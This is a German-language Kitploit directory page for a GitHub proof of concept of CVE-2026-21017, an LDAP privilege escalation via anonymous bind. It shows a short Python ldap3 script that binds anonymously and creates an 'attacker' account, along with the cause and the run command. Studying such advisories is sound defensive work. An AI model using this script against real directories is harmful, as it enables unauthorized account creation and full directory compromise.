Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-21017-LDAP-Anonymous-Bind-Privilege-Escalation — Python-Proof-of-Concept für die LDAP-Privilegienerweiterung durch anonyme Binds, das unsichere ACLs simuliert, um über unauthentifizierte LDAP-Binds Admin-Benutzer zu erstellen. | Kitploit
Tools/GitHubGitHub/george0papasotiriou/cve-2026-21017-ldap-anonymous-bind-privilege-escalation
Authentifizierung & AutorisierungPrivilege EscalationSchwachstellenanalyseExploitationPenetrationstestsFehlkonfiguration
GitHubgeorge0papasotiriou/cve-2026-21017-ldap-anonymous-bind-privilege-escalation

CVE-2026-21017-LDAP-Anonymous-Bind-Privilege-Escalation

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Python-Proof-of-Concept für die LDAP-Privilegienerweiterung durch anonyme Binds, das unsichere ACLs simuliert, um über unauthentifizierte LDAP-Binds Admin-Benutzer zu erstellen.

Repository anzeigen
6vor 1 MonatNoch nicht geprüft

CVE-2026-21017 – Privilegieneskalation durch anonymen LDAP-Bind

Programmcode (Python-ldap3-Simulation)

root@kitploit:~
# ldap_anon_sim.py - LDAP server allowing anonymous bind with write access
from ldap3 import Server, Connection, ALL

# Simulated: real server would be misconfigured
server = Server('ldap://localhost:389', get_info=ALL)
conn = Connection(server, authentication='ANONYMOUS')
conn.bind()
# If anonymous has write permission to userPassword, can add self as admin
conn.add('uid=attacker,ou=people,dc=example,dc=com', ['inetOrgPerson'], {'uid': 'attacker', 'userPassword': 'password'})
print("User created anonymously!")

CVE-2026-21017 – Privilegieneskalation durch anonymen LDAP-Bind

Severity: Critical

Überblick

Ein LDAP-Verzeichnis ist falsch konfiguriert: Es erlaubt anonyme Binds und gewährt zudem Schreibzugriff auf sensible Attribute (wie userPassword). Ein Angreifer kann sich anonym binden und einen neuen Admin-Benutzer erstellen, wodurch Privilegien eskaliert werden.

Details zur Schwachstelle

  • Typ: Unzureichende Zugriffskontrolle
  • Auswirkung: Vollständige Kompromittierung des Verzeichnisses.
  • Ursache: Die Zugriffskontrollliste (ACL) schränkt Schreibzugriffe nicht auf authentifizierte Benutzer ein.

Exploit-Demonstration

Führen Sie die Simulation aus (für einen echten Test ist ein tatsächlicher LDAP-Server erforderlich, wir zeigen jedoch das Konzept):

root@kitploit:~
python ldap_anon_sim.py

Das Skript versucht, anonym einen Benutzer hinzuzufügen.

Tool herunterladen